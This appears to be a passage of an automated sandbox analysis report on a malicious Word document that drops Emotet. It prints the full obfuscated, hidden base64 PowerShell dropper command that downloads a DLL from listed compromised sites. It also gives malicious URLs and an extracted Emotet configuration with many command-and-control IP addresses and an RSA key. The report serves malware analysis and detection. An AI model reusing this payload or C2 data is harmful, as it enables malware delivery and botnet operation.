                      Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJ

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://3musketeersent.net/wp-includes/TUgD/Avira URL Cloud: Label: malware
                      Source: http://dashudance.com/thinkphp/dgs7Jm9/Avira URL Cloud: Label: malware
                      Source: http://shannared.com/content/lhALeS/Avira URL Cloud: Label: malware
                      Source: http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/Avira URL Cloud: Label: malware
                      Source: http://leopardcranes.com/zynq-linux-yaayf/w/Avira URL Cloud: Label: malware
                      Found malware configurationShow sources
                      Source: 7.2.rundll32.exe.2e0000.1.raw.unpackMalware Configuration Extractor: Emotet {"C2 list": ["84.232.229.24:80", "51.255.203.164:8080", "217.160.169.110:8080", "185.183.16.47:80", "190.45.24.210:80", "187.162.248.237:80", "93.146.143.191:80", "185.94.252.27:443", "143.0.85.206:7080", "80.15.100.37:80", "85.105.239.184:443", "94.176.234.118:443", "62.84.75.50:80", "137.74.106.111:7080", "172.104.169.32:8080", "46.105.114.137:8080", "94.126.8.1:80", "78.206.229.130:80", "93.149.120.214:80", "192.175.111.212:7080", "80.249.176.206:80", "181.10.46.92:80", "190.24.243.186:80", "191.223.36.170:80", "177.23.7.151:80", "154.127.113.242:80", "51.255.165.160:8080", "87.106.46.107:8080", "85.214.26.7:8080", "190.247.139.101:80", "46.101.58.37:8080", "201.185.69.28:443", "46.43.2.95:8080", "82.208.146.142:7080", "110.39.160.38:443", "186.177.174.163:80", "51.38.124.206:80", "81.4.105.175:8080", "209.33.120.130:80", "172.245.248.239:8080", "45.16.226.117:443", "104.130.154.83:7080", "217.13.106.14:8080", "94.23.45.86:7080", "152.169.22.67:80", "12.162.84.2:8080", "201.48.121.65:443", "81.17.93.134:80", "81.215.230.173:443", "60.93.23.51:80", "122.201.23.45:443", "31.27.59.105:80", "105.209.235.113:8080", "197.232.36.108:80", "91.233.197.70:80", "87.106.253.248:8080", "138.97.60.141:7080", "152.170.79.100:80", "190.251.216.100:80", "177.85.167.10:80", "212.71.237.140:8080", "82.48.39.246:80", "213.52.74.198:80", "116.125.120.88:443", "81.214.253.80:443", "149.62.173.247:8080", "152.231.89.226:80", "206.189.232.2:8080", "181.30.61.163:443", "1.226.84.243:8080", "191.241.233.198:80", "109.101.137.162:8080", "110.39.162.2:443", "167.71.148.58:443", "5.196.35.138:7080", "190.64.88.186:443", "200.75.39.254:80", "138.97.60.140:8080", "170.81.48.2:80", "70.32.115.157:8080", "104.131.41.185:8080", "190.162.232.138:80", "188.135.15.49:80", "95.76.153.115:80", "188.225.32.231:7080", "12.163.208.58:80", "50.28.51.143:8080", "202.134.4.210:7080", "190.210.246.253:80", "149.202.72.142:7080", "138.197.99.250:8080", "68.183.190.199:8080", "211.215.18.93:8080"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: http://3musketeersent.net/wp-includes/TUgD/Virustotal: Detection: 8%Perma Link
                      Source: https://skilmu.com/wp-admin/hQVlB8b/Virustotal: Detection: 10%Perma Link
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\Kaktksw\An6othh\N49I.dllReversingLabs: Detection: 82%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: ARCH_25_012021.docVirustotal: Detection: 57%Perma Link
                      Source: ARCH_25_012021.docReversingLabs: Detection: 26%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\Kaktksw\An6othh\N49I.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0074CC2A CryptDecodeObjectEx,14_2_0074CC2A

                      Compliance:

                      barindex
                      Uses new MSVCR DllsShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Binary contains paths to debug symbolsShow sources
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2098362682.0000000002740000.00000002.00000001.sdmp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior